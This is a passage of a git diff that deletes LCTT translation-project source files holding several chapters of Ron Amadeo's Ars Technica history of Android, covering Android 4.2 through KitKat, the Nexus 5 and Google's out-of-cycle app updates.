-The clock's time picker was particularly well-designed. It showed a simple number pad, and it would intelligently disable numbers that would result in an invalid time. It was also impossible to set an alarm time without implicitly selecting AM or PM, forever solving the problem of accidentally setting an alarm for 9pm instead of 9am.
-
-![The new system UI for tablets used a stretched-out phone interface.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/tablet2.jpg)
-The new system UI for tablets used a stretched-out phone interface.
-Photo by Ron Amadeo
-
-The most controversial change in Android 4.2 was made to the tablet UI, which switched from a unified single bottom system bar to a two-bar interface with a top status bar and bottom system bar. The new design unified the phone and tablet interfaces, but critics said it was a waste of space to stretch the phone interface to a 10-inch landscape tablet. Since the navigation buttons had the whole bottom bar to themselves now, they were centered, just like the phone interface.
-
-![Multiple users on a tablet, and the new gesture-driven keyboard.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/2014-03-06-14.55.png)
-Multiple users on a tablet, and the new gesture-driven keyboard.
-Photo by Ron Amadeo
-
-On tablets, Android 4.2 brought support for multiple users. In the settings, a "Users" section was added, where you could manage users on a device. Setup was done from within each user account, where Android would keep separate settings, home screens, apps, and app data for each user.
-
-4.2 also added a new keyboard with swiping abilities. Rather than just tapping each individual letter, users could now keep a finger on the screen the whole time and just slide from letter to letter to type.
-
-----------
-
-![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
-
-[Ron Amadeo][a] / Ron is the Reviews Editor at Ars Technica, where he specializes in Android OS and Google products. He is always on the hunt for a new gadget and loves to rip things apart to see how they work.
-
-[@RonAmadeo][t]
-
---------------------------------------------------------------------------------
-
-via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/22/
-
-译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
-
-[1]:http://arstechnica.com/gadgets/2014/01/hands-on-with-samsungs-notepro-and-tabpro-new-screen-sizes-and-magazine-ui/
-[2]:http://cdn.arstechnica.net/wp-content/uploads/2013/12/device-2013-12-26-11016071.png
-[a]:http://arstechnica.com/author/ronamadeo
-[t]:https://twitter.com/RonAmadeo
diff --git a/sources/talk/The history of Android/23 - The history of Android.md b/sources/talk/The history of Android/23 - The history of Android.md
deleted file mode 100644
index e67dff87e6..0000000000
--- a/sources/talk/The history of Android/23 - The history of Android.md
+++ /dev/null
@@ -1,59 +0,0 @@
-The history of Android
-================================================================================
-![Another Play Store redesign! This one is very close to the current design and uses cards that make layout changes a piece of cake.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/get-em-Kirill.jpg)
-Another Play Store redesign! This one is very close to the current design and uses cards that make layout changes a piece of cake.
-Photo by Ron Amadeo
-
-### Out-of-cycle updates—who needs a new OS? ###
-
-In between Android 4.2 and 4.3, Google went on an out-of-cycle update tear and showed just how much Android could be improved without having to fire up the arduous OTA update process. Thanks to the [Google Play Store and Play Services][1], all of these updates were able to be delivered without updating any core system components.
-
-In April 2013, Google released a major redesign to the Google Play Store. Like most redesigns from here on out, the new Play Store fully adopted the Google Now aesthetic, with white cards on a gray background. The action bar changed color based on the current content section, and since the first screen featured content from all sections of the store, the action bar was a neutral gray. Buttons to navigate to the content sections were now given top billing, and below that was usually a promotional block or rows of recommended apps.
-
-
-![The individual content sections are beautifully color-coded.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/content-rainbow.jpg)
-The individual content sections are beautifully color-coded.
-Photo by Ron Amadeo
-
-The new Play Store showed off the real power of Google’s card design language, which enabled a fully responsive layout across all screen sizes. One large card could be stuck next to several little cards, larger-screened devices could show more cards, and rather than stretch things in horizontal mode, more cards could just be added to a row. The Play Store content editors were free to play with the layout of the cards, too; a big release that needed to be highlighted could get a larger card. This design would eventually trickle down to the other Google Play content apps, finally resulting in a unified design.
-
-![Hangouts replaced Google Talk and is now continually developed by the Google+ team.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/talkvhangouts2.jpg)
-Hangouts replaced Google Talk and is now continually developed by the Google+ team.
-Photo by Ron Amadeo
-
-Google I/O, the company's annual developer conference, was usually where a new Android version was announced. But at the 2013 edition, Google made just as many improvements without having to update the OS.
-
-One of the biggest things announced at the show was an update to Google Talk, Google's instant messaging platform. For a long time, Google shipped four text communication apps for Android: Google Talk, Google+ Messenger, Messaging (the SMS app), and Google Voice. Having four apps that accomplished the same task—sending a text message to someone—was very confusing for users. At I/O, Google killed Google Talk and started their messaging product over from scratch, creating [Google Hangouts][2]. While initially it only replaced Google Talk, the plan for Hangouts was to unify all of Google's various messaging apps into a single interface.
-
-The layout of the Hangouts UI really wasn't drastically different from Google Talk. The main page contained your open conversations, and tapping on one opened a chat page. The design was updated, the chat page now used a card-style display for each paragraph, and the chat list was now a "drawer"-style interface, meaning you could open it with a horizontal swipe. Hangouts had read receipts and a typing status indicator, and group chat was now a primary feature.
-
-Google+ was the center of Hangouts now, so much so that the full name of the product was actually "Google+ Hangouts." Hangouts was completely integrated with the Google+ desktop site so that video and chats could be made from one to the other. Identity and avatars were pulled from Google+, and tapping on an avatar would open that person's Google+ profile. And much like the change from Browser to Google Chrome, core Android functionality was passed off to a separate team—the Google+ team—as opposed to being a side product of the very busy Android engineers. With the Google+ takeover, Android's main IM client now became a continually developed application. It was placed into the Play Store and received fairly regular updates.
-
-![The new navigation drawer interface.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/navigation_drawer_overview1.png)
-The new navigation drawer interface.
-Photo by [developer.android.com][3]
-
-Google also introduced a new design element for the action bar: the navigation drawer. This drawer was shown as a set of three lines next to the app icon in the top-left corner. By tapping on it or dragging from the left edge of the screen to the right, a side-mounted menu would appear. As the name implies, this was used to navigate around the app, and it would show several top-level locations within the app. This allowed the first screen to show content, and it gave users a consistent, easy-to-access place for navigation elements. The nav drawer was basically a super-sized version of the normal menu, scrollable and docked to the left side.
-
-----------
-
-![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
-
-[Ron Amadeo][a] / Ron is the Reviews Editor at Ars Technica, where he specializes in Android OS and Google products. He is always on the hunt for a new gadget and loves to rip things apart to see how they work.
-
-[@RonAmadeo][t]
-
---------------------------------------------------------------------------------
-
-via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/23/
-
-译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
-
-[1]:http://arstechnica.com/gadgets/2013/09/balky-carriers-and-slow-oems-step-aside-google-is-defragging-android/
-[2]:http://arstechnica.com/information-technology/2013/05/hands-on-with-hangouts-googles-new-text-and-video-chat-architecture/
-[3]:https://developer.android.com/design/patterns/navigation-drawer.html
-[a]:http://arstechnica.com/author/ronamadeo
-[t]:https://twitter.com/RonAmadeo
\ No newline at end of file
diff --git a/sources/talk/The history of Android/24 - The history of Android.md b/sources/talk/The history of Android/24 - The history of Android.md
deleted file mode 100644
index b95ceb29c7..0000000000
--- a/sources/talk/The history of Android/24 - The history of Android.md
+++ /dev/null
@@ -1,82 +0,0 @@
-The history of Android
-================================================================================
-![The slick new Google Play Music app, which changed from Tron to a perfect match for the Play Store.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/Goooogleplaymusic.jpg)
-The slick new Google Play Music app, which changed from Tron to a perfect match for the Play Store.
-Photo by Ron Amadeo
-
-Another app update pushed out at I/O was a new Google Music app. The app was completely redesigned, finally doing away with the blue-on-blue design introduced in Honeycomb. Play Music's design was unified with the new Play Store released a few months earlier, with a responsive white card layout. Music was also one of the first major apps to take advantage of the new navigation drawer style. Along with the new app, Google launched Google Play Music All Access, an all-you-can-eat subscription service for $10 a month. Google Music now had a subscription plan, à la carte purchasing, and a cloud music locker. This version also introduced "Instant Mix," a mode where Google would cloud-compute a playlist of similar songs.
-
-![A game showing support for Google Play Games. This lineup shows the Play Store game feature descriptions, the permissions box triggered by signing into the game, a Play Games notification, and the achievements screen.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/gooooogleplaygames.jpg)
-A game showing support for Google Play Games. This lineup shows the Play Store game feature descriptions, the permissions box triggered by signing into the game, a Play Games notification, and the achievements screen.
-Photo by Ron Amadeo
-
-Google also introduced "Google Play Games," a back-end service that developers could plug into their games. The service was basically an Android version of Xbox Live or Apple's Game Center. Developers could build Play Games support into their game, which would easily let them integrate achievements, leaderboards, multiplayer, matchmaking, user accounts, and cloud saves by using Google's back-end services.
-
-Play Games was the start of Google's big push into gaming. Just like standalone GPS units, flip phones, and MP3 players, smartphone makers were hoping standalone gaming devices would be turned into nothing more than a smartphone feature bullet point. Why buy a Nintendo DS or PS Vita when you had a smartphone with you? An easy-to-use multiplayer service would be a big part of this, and we've still yet to see the final consequence of this move. Today, Google and Apple are both rumored to be planning living room gaming devices.
-
-![Google Keep, Google's first note taking service since Google Notebook.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/goooglekeep.jpg)
-Google Keep, Google's first note taking service since Google Notebook.
-Photo by Ron Amadeo
-
-It was clear some products were developed in time for presentation at Google I/O, [but the three-and-a-half-hour keynote][1] was already so massive that some things were cut from the announcements. Once the smoke cleared three days after Google I/O, Google introduced Google Keep, a note taking app for Android and the Web. Keep was a fairly straightforward affair, applying the responsive Google Now-style design to a note taking app. Users could change the size of the cards from a multi-column layout to a single column view. Notes could consist of plain text, checklists, voice notes with automatic transcription, or pictures. Note cards could be dragged around and rearranged on the main screen, and you could even assign a color to a note.
-
-![Gmail 4.5, which switched to the new navigation drawer design and merged the action bars, thanks to some clever button elimination.](http://cdn.arstechnica.net/wp-content/uploads/2014/05/gmail.png)
-Gmail 4.5, which switched to the new navigation drawer design and merged the action bars, thanks to some clever button elimination.
-Photo by Ron Amadeo
-
-After I/O, not much was safe from Google's out-of-cycle updating. In June 2013, Google released a redesigned version of Gmail. The headline feature of the new design was the new navigation drawer interface that was introduced a month earlier at Google I/O. The most eye-catching change was the addition of Google+ profile pictures instead of checkboxes. While the checkboxes were visibly removed, the functionality was still there: just tap on a picture.
-
-![The new Google Maps, which switched to an all-white Google Now-style theme.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/newmaps11.png)
-The new Google Maps, which switched to an all-white Google Now-style theme.
-Photo by Ron Amadeo
-
-One month later, Google released a completely overhauled version of Google Maps to the Play Store. It was the first ground-up redesign of Google Maps since Ice Cream Sandwich. The new version fully adopted the Google Now white card aesthetic, and it greatly reduced the amount of stuff on the screen. The new Google Maps seemed to have a design mandate to always show a map on the screen somewhere, as you’ll be hard pressed to find something other than the settings that fully covers the map.
-
-This version of Google Maps seemed to live in its own little design world. The white search bar "floated" above the map, with the map showing on the sides and top of the bar, so it didn't really read as the traditional action bar design. The navigation drawer, in the top left on every other app, was in the bottom left. There was no up button, app icon, or overflow button on the main screen.
-
-![The new Google Maps cut a lot of fat and displayed more information on a single screen.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/newmaps21.png)
-The new Google Maps cut a lot of fat and displayed more information on a single screen.
-Photo by Ron Amadeo
-
-The left picture shows what popped up when you tapped on the search bar (along with the keyboard, which had been closed). In the past, Google would show an empty page below a blank search bar, but in Maps, Google used that space to link to the new “Local" page. The “blank" search results displayed links to common, browsable results like restaurant listings, gas stations, and attractions. At the bottom of the results page was a list of nearby results from your search history and an option to manually cache parts of the map.
-
-The right set of images shows the location page. The map shown at the top of the Maps 7 screenshot isn't a thumbnail; that's the full map view. In the new version of Google Maps, a location was displayed as a card that "floats" on top of the main map, and the map was repositioned to center on the location. Scrolling up would move the card up and cover the map, and scrolling down would show the whole map with the result reduced to a small strip at the bottom. If the location was part of a list of search results, swiping left and right would move through the results.
-
-The location pages were redesigned to be much more useful at a glance. On the first page, the new version added critical information, like the location on a map, the review score, and the number of reviews. Since this is a phone, and the software will be dialing for you, the phone number was deemed pointless and was removed. The old version showed the distance to the location in miles, while the new version of Google Maps showed the distance in terms of time, based on traffic and preferred mode of transportation—a much more useful metric. The new version also put a share button front and center, which made coordination over IM or text messaging a lot easier.
-
-### Android 4.3, Jelly Bean—getting wearable support out early ###
-
-Android 4.3 would have been an incredible update if Google had done the traditional thing and not released updates between 4.2 and 4.3 through the Play Store. If the new Play Store, Gmail, Maps, Books, Music, Hangouts, Keep, and Play Games had been bundled into a big brick as a new version of Android, it would have been hailed as the biggest release ever. Google didn't need to hold back features anymore, though. With very little left that required an OS update, at the end of July 2013, Google released the seemingly insignificant update called "Android 4.3."
-
-![Android Wear plugging into Android 4.3's Notification access screen.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/2014-03-28-12.231.jpg)
-Android Wear plugging into Android 4.3's Notification access screen.
-Photo by Ron Amadeo
-
-Google made no secret of 4.3's low importance, calling the newest release "Jelly Bean" (the third one in a row). Android 4.3's feature list read like a laundry list of things Google couldn't update from the Play Store or through Google Play Services, mostly consisting of low-level framework changes for developers.
-
-Many of the additions seemed to fit a singular purpose, though—Android 4.3 was Google's trojan horse for wearable computing support. 4.3 added support for Bluetooth Low Energy, a way to wirelessly connect Android to another device and pass data back and forth while using a very small amount of power—an integral feature to a wearable device. Android 4.3 also added a "Notification Access" API, which allowed apps to completely replicate and control the notification panel. Apps could display notification text and pictures and interact with the notification the same way users do—namely pressing action buttons and dismissing notifications. Doing this from an on-board app when you have the notification panel is useless, but on a device that is separate from your phone, replicating the information in the notification panel becomes much more useful. One of the few apps that plugged into this was "Android Wear Preview," which used the notification API to power most of the interface for Android Wear.
-
-The "4.3 is for wearables" theory explained the relatively low number of features in 4.3: it was pushed out the door to give OEMs time to update devices in time for the launch of [Android Wear][2]. The plan seems to have worked. Android Wear requires Android 4.3 and up, which has been out for so long now that most major flagships have updated.
-
-Android 4.3 was not all that exciting, but Android releases from here on out didn't need to be all that exciting. Everything became so modularized that Google could push updates out as soon as they were done through Google Play, rather than drop everything in one huge brick as an OS update.
-
-----------
-
-![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
-
-[Ron Amadeo][a] / Ron is the Reviews Editor at Ars Technica, where he specializes in Android OS and Google products. He is always on the hunt for a new gadget and loves to rip things apart to see how they work.
-
-[@RonAmadeo][t]
-
---------------------------------------------------------------------------------
-
-via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/24/
-
-译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
-
-[1]:http://live.arstechnica.com/liveblog-google-io-2013-keynote/
-[2]:http://arstechnica.com/gadgets/2014/03/in-depth-with-android-wear-googles-quantum-leap-of-a-smartwatch-os/
-[a]:http://arstechnica.com/author/ronamadeo
-[t]:https://twitter.com/RonAmadeo
\ No newline at end of file
diff --git a/sources/talk/The history of Android/25 - The history of Android.md b/sources/talk/The history of Android/25 - The history of Android.md
deleted file mode 100644
index 39eeb55768..0000000000
--- a/sources/talk/The history of Android/25 - The history of Android.md
+++ /dev/null
@@ -1,70 +0,0 @@
-The history of Android
-================================================================================
-![The LG-made Nexus 5, the launch device for KitKat.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/nexus56.jpg)
-The LG-made Nexus 5, the launch device for KitKat.
-
-### Android 4.4, KitKat—more polish; less memory usage ###
-
-Google got really cute with the launch of Android 4.4. The company [teamed up with Nestlé][1] to name the OS "KitKat," and it launched on Halloween, October 31, 2013. Nestlé produced limited-edition Android-shaped KitKat bars, and KitKat packaging in stores promoted the new OS while offering a chance to win a Nexus 7.
-
-KitKat launched with a new Nexus device, the Nexus 5. The new flagship had the biggest display yet: a five-inch, 1920×1080 LCD. Despite the bigger screen size, LG—again the manufacturer for the device—was able to fit the Nexus 5 into the same dimensions as a Galaxy Nexus or Nexus 4.
-
-The Nexus 5 was specced comparably to the highest-end phones at the time, with a 2.3GHz Snapdragon 800 processor and 2GB of RAM. The phone was again sold unlocked on the Play Store, but while most phones with specs like this would go for $600-$700, Google sold the Nexus 5 for only $350.
-
-One of the most important improvements in KitKat was one you couldn't see: significantly lower memory usage. For KitKat, Google started a concerted effort, called "Project Svelte," to lower memory usage across the OS and bundled apps. After tons of optimization work and a "low memory" mode that disabled expensive graphical effects, Android could now run on as little as 340MB of RAM. Lower memory requirements were a big deal, because devices in the developing world—the biggest growth markets for smartphones—often ran on only 512MB of RAM. Ice Cream Sandwich's more advanced UI significantly raised the system requirements of Android devices, which left many low-end devices—even newly released low-end devices—stuck on Gingerbread. The lower system requirements of KitKat were meant to bring these cheap devices back into the fold. With KitKat, Google hoped to finally kill Gingerbread (which, at the time of writing, is around 20 percent of the market). Just in case the lower system requirements weren't enough, there have even been reports that Google will [no longer license][2] the Google apps to Gingerbread devices.
-
-Besides bringing low-end phones to a modern version of the OS, Project Svelte's lower memory requirements were to be a boon to wearable computers, too. Google Glass [announced][3] it was also switching to the slimmer OS, and [Android Wear][4] ran on KitKat, too. The lower memory requirements in Android 4.4 and the notification API and Bluetooth LE support in 4.3 came together nicely to support wearable computing.
-
-KitKat also featured a lot of polish to the core OS interfaces that couldn't be updated via the Play Store. The System UI, Dialer, Clock, and Settings all saw updates.
-
-![KitKat's transparent bars on the Google Now Launcher.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/1homescreenz.png)
-KitKat's transparent bars on the Google Now Launcher.
-Photo by Ron Amadeo
-
-KitKat not only got rid of the unpopular lines to the left and right sides of the lock screen—it completely disabled lock screen widgets by default! Google obviously felt multiple lock screens and multiple home screens were a little too complicated for new users, so lock screen widgets now needed to be enabled in the settings. The lopsided time here and in the clock app was switched to a symmetrical weight, which looked a lot nicer.
-
-In KitKat, apps had the ability to make the system and status bars transparent, which significantly changed the look of the OS. The bars now blended into the wallpaper and any other app that chose to enable transparent bars. The bars could also be completely hidden by any app via a new feature called “immersive" mode.
-
-KitKat was the final nail in the “Tron" coffin, removing almost all traces of blue from the operating system. The status bar icons were changed from a blue to a neutral white. The status and system bars on the home screen weren’t completely transparent; a dark gradient was added to the top and bottom of the screen so that the white icons would still be visible on a light background.
-
-![Tweaks to Google Now and the folders.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/nowfolders.png)
-Tweaks to Google Now and the folders.
-Photo by Ron Amadeo
-
-The home screen that shipped with KitKat on the Nexus 5 was actually exclusive to the Nexus 5 for a few months, but now it could run on any Nexus device. The new home screen was called the "Google Now Launcher," and it was actually [the Google Search app][5]. Yes, Google Search grew from a simple search box to an entire home screen, and in KitKat, it drew the wallpaper, icons, app drawer, widgets, home screen settings, Google Now, and, of course, the search box. Thanks to Search now running the entire home screen, any time the home screen was open and the screen was on, voice commands could be activated by saying "OK Google." This was pointed out to the user with introductory "Say 'OK Google'" text in the search bar, which would fade away after a few uses.
-
-Google Now was more integrated, too. Besides the usual swipe up from the system bar, Google Now was also the leftmost home screen. The new version brought some design tweaks as well. The Google logo was moved into the search bar, and the whole top area was compacted. A few card designs were cleaned up, and a new set of buttons at the bottom led to reminders, customization options, and an overflow button with settings, feedback, and help. Since Google Now was part of the home screen, it got transparent system and status bars, too.
-
-Transparency and “brightening up" certain parts of the OS were design themes in KitKat. Black was removed in the status and system bars by switching to transparent, and the black background of the folders was switched to white.
-
-![A screenshot showing the new, cleaner app screen layout, and a composite image of the app lineup.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/apps.png)
-A screenshot showing the new, cleaner app screen layout, and a composite image of the app lineup.
-Photo by Ron Amadeo
-
-The KitKat icon lineup changed significantly from 4.3. To put it more dramatically, it was a bloodbath, with Google removing seven icons relative to the 4.3 loadout. Google Hangouts could handle SMS now, so the Messaging app was removed. Hangouts also took over Google+ Messenger duties, so that app shortcut was cut. Google Currents was removed as a default app, as it would soon be killed—along with Google Play Magazines—in favor of Google Play Newsstand. Google Maps was beaten back into a single icon, which meant Local and Navigation shortcuts were removed. The impossible-to-understand Movie Studio was cut, too—Google must have realized no one wants to edit movies on a phone. Thanks to the home screen "OK Google" hotword detection, the Voice Search icon was rendered redundant and removed. Depressingly, the long abandoned News & Weather app remained.
-
-There was a new app called "Photos"—really the Google+ app—which took over picture management duties. On the Nexus 5, the Gallery and Google+ Photos were pretty similar, but in newer builds of KitKat present on Google Play Edition devices, the Gallery was completely replaced by Google+ Photos. Play Games was an interface for Google's back-end multiplayer service—a Googly version of Xbox Live or Apple's Game Center. Google Drive, which existed for years as a Play Store app, was finally made a default app. Google bought Quickoffice back in June 2012, now finally deeming the app acceptable for inclusion by default. While Drive opened Google Documents, Quickoffice opened Microsoft Office documents. If you're keeping track, that was two document editing apps and two photo editing apps included on most KitKat loadouts.
-
-----------
-
-![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
-
-[Ron Amadeo][a] / Ron is the Reviews Editor at Ars Technica, where he specializes in Android OS and Google products. He is always on the hunt for a new gadget and loves to rip things apart to see how they work.
-
-[@RonAmadeo][t]
-
---------------------------------------------------------------------------------
-
-via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/25/
-
-译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
-
-[1]:http://arstechnica.com/gadgets/2013/09/official-the-next-edition-of-android-is-kitkat-version-4-4/
-[2]:http://www.androidpolice.com/2014/02/10/rumor-google-to-begin-forcing-oems-to-certify-android-devices-with-a-recent-os-version-if-they-want-google-apps/
-[3]:http://www.androidpolice.com/2014/03/01/glass-xe14-delayed-until-its-ready-promises-big-changes-and-a-move-to-kitkat/
-[4]:http://arstechnica.com/gadgets/2014/03/in-depth-with-android-wear-googles-quantum-leap-of-a-smartwatch-os/
-[5]:http://arstechnica.com/gadgets/2013/11/google-just-pulled-a-facebook-home-kitkats-primary-interface-is-google-search/
-[a]:http://arstechnica.com/author/ronamadeo
-[t]:https://twitter.com/RonAmadeo
\ No newline at end of file
diff --git a/sources/talk/The history of Android/26 - The history of Android.md b/sources/talk/The history of Android/26 - The history of Android.md
deleted file mode 100644
index 3f9e1427ba..0000000000
--- a/sources/talk/The history of Android/26 - The history of Android.md
+++ /dev/null
@@ -1,87 +0,0 @@
-The history of Android
-================================================================================
-![The new "add to home screen" interface was definitely inspired by Honeycomb.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/homesetupthrowback.png)
-The new "add to home screen" interface was definitely inspired by Honeycomb.
-Photo by Ron Amadeo
-
-KitKat added a nice throwback to Honeycomb with the home screen configuration screen. On the massive 10-inch screen of a Honeycomb tablet (right picture, above), long pressing on the home screen background would present you with a zoomed-out view of all your home screens. Widgets could be dragged from the bottom widget drawer into any home screen—it was very handy. When it came time to bring the Honeycomb interface to phones, from Android 4.0 all the way to 4.3, Google skipped this design and left it to the larger-screened devices, presenting only a list of options after a long press (center picture).
-
-For KitKat, though, Google finally came up with a solution. After a long press, 4.4 presented a slightly zoomed-out view—you could see the current home screen and the screens to the left and right of it. Tapping on the "widgets" button would open a full screen list of widget thumbnails, but after long-pressing on a widget, you were thrown back into the zoomed-out view and could scroll through home screen pages and place the icon where you wanted. By dragging an icon or widget all the way past the rightmost home page, you could create a new home page.
-
-![Contacts and the Keyboard both removed any trace of blue.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/RIP33B5E5.png)
-Contacts and the Keyboard both removed any trace of blue.
-Photo by Ron Amadeo
-
-KitKat was the end of the line for the Tron design. In most parts of the OS, any remaining blue highlights were removed in favor of gray. In the People app, blue was sucked out of the header and the letter separators in the contact list. The pictures swapped sides and the bottom bar was changed to a light gray to match the top. The Keyboard, which injected the color blue into nearly every app, was changed to gray-on-gray-on-gray. That wasn't a bad thing. Apps should be allowed to have their own color scheme—forcing a potentially clashing color on them via the keyboard wasn’t good design.
-
-![The first three screenshots show KitKat's dialer, and the last one is 4.3.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/phone.png)
-The first three screenshots show KitKat's dialer, and the last one is 4.3.
-Photo by Ron Amadeo
-
-Google completely revamped the dialer in KitKat, creating a wild new design that changed the way users thought about a phone. Actual numbers in the new dialer were hidden as much as possible—there wasn’t even a dial pad on the main screen. The primary interface for making a phone call was now a search bar! If you wanted to call someone in your contacts, just type their name in; if you wanted to call a business, just type the business name in and the dialer would search through Google Maps’ extensive database of phone numbers. It worked incredibly well and was something only Google could pull off.
-
-If searching for numbers wasn’t your thing, the app also intelligently displayed a listing for the previous phone call, your most-contacted people, and a link to all contacts. At the bottom were links to your call history, the now old school number pad, and the usual overflow button containing a settings page.
-
-![Office stuff: Google Drive, which was now packed in, and the printing support.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/googledrive-and-printing.png)
-Office stuff: Google Drive, which was now packed in, and the printing support.
-Photo by Ron Amadeo
-
-It was amazing that it took this long, but in KitKat, Google Drive was finally included as a default app. Drive allowed users to create and edit Google Docs spreadsheets and documents, scan documents with the camera and upload them as PDFs, or view (but not edit) presentations. Drive, by this point, had a great, modern design with a slide-out navigation drawer and a Google Now-style card design.
-
-For even more mobile office fun, KitKat included an OS-level printing framework. At the bottom of the settings was a "Printing" screen, and any printer OEM could make a plugin for it. Google Cloud Print was, of course, one of the first supporters. Once your printer was hooked up to Cloud Print, either natively or through a computer with Chrome installed, you could print to it over the Internet. Apps needed to support the printing framework, too. Pressing the little "i" button on Google Drive would show information about the document and give you the option to print it. Just like a desktop OS, a print dialog would pop up with settings like copies, paper size, and page selection.
-
-![The "Photos" section of the Google+ app, which replaced the Gallery.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/that-is-one-dead-gallery.png)
-The "Photos" section of the Google+ app, which replaced the Gallery.
-Photo by Ron Amadeo
-
-Google+ Photos and the Gallery initially shipped together on the Nexus 5, but in a later build of KitKat on Google Play devices, the Gallery was axed and Google+ completely took over photo duties. The new app changed the photo app from a light theme to a dark theme, and Google+ Photos brought a modern navigation drawer design.
-
-Android had long included an instant upload feature, which would automatically back up all pictures to Google’s cloud storage, first on Picasa and later on Google+. The big benefit of G+ Photos over the Gallery was that it could finally manage those cloud-stored photos. A little cloud icon in the lower right of a photo indicated backup status, and it would fill from right to left to indicate an upload in progress. G+ Photos brought its own photo editor along with support for a million other Google+ photo features, like highlights, auto awesome, and, of course, sharing to Google+.
-
-![Tweaks to the Clock app, which added an alarms tab and changed the time input dialog.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/clocks.png)
-Tweaks to the Clock app, which added an alarms tab and changed the time input dialog.
-Photo by Ron Amadeo
-
-Google changed the excellent time picker that was introduced in 4.2 to this strange clock interface, which was both slower and less precise than the old interface. First you were presented with a one-handed clock which you used to choose the hour, then that clock went away and another one-handed clock allowed you to choose the minute. Having to spin the minute hand or tap a spot on the clock face made it very difficult to pick times in non-five-minute increments. Unlike the old time picker, which required you to explicitly pick AM or PM, this one just defaulted to AM (again making it possible to accidentally be off by 12 hours).
-
-### Today—Android everywhere ###
-
-![](http://cdn.arstechnica.net/wp-content/uploads/2014/05/android-everywhere2.png)
-Photo by Google/Sony/Motorola/Ron Amadeo
-
-What started out as a curious BlackBerry clone from a search engine company became the most popular OS in the world from one of the biggest titans in the tech industry. Android has become Google's de-facto consumer operating system, and it powers phones, tablets, Google Glass, Google TV, and more. [Parts of it][1] are even used in the Chromecast. In the future, Google will be bringing Android to watches and wearables with [Android Wear][2], and the [Open Automotive Alliance][3] will be bringing Android to cars. Google will be making a renewed commitment to the living room soon, too, with [Android TV][4]. The OS is such a core pillar of Google that events that are supposed to cover company-wide products, like Google I/O, end up becoming Android launch parties.
-
-![Top row: the Google Play content stores. Bottom row: the Google Play Apps.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/2014-03-30-03.08.jpg)
-Top row: the Google Play content stores. Bottom row: the Google Play Apps.
-Photo by Ron Amadeo
-
-What was once the ugly duckling of the mobile industry has transformed so much it now [wins design awards][5] for its user interface. The design of things like Google Now have affected everything the company produces, with even the desktop sites like Search, Google+, YouTube, and Maps getting in on the card design unity. The design keeps evolving as well. Google's next plan is to [unify design][6] across not just Android, but all of its products. The goal is to take something like Gmail and make it feel the same, whether you're using it on Android, a desktop browser, or a watch.
-
-Google outsourced so many pieces of Android to the Play Store that version releases are becoming less and less necessary. Google decided the best way to beat carrier and OEM update issues was to sidestep those roadblocks completely. From here on out, there isn't much left to include in an Android update other than core under-the-hood changes—but even many APIs have been pushed to Google Play Services. If you just look at version releases, it seems like Android development has slowed down from the peak 2.5-month release cycle. But the reality is that Google can now continually push out improvements through the Play Store in a never-ending, somewhat subtler stream of updates.
-
-With 1.5 million activations per day, Android has nowhere to go but up. In the future, Android will be headed from phones and tablets to cars and watches, and the lower system requirements of KitKat will drive phone prices even lower in the developing world. The bottom line? More and more people will get online. And for many of those people, Android will be not just their phone but their primary computing device. With Android leading the charge for Google in so many areas, the OS that started off as a tiny acquisition has become one of Google's most important products.
-
-----------
-
-![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
-
-[Ron Amadeo][a] / Ron is the Reviews Editor at Ars Technica, where he specializes in Android OS and Google products. He is always on the hunt for a new gadget and loves to rip things apart to see how they work.
-
-[@RonAmadeo][t]
-
---------------------------------------------------------------------------------
-
-via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/26/
-
-译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID)
-
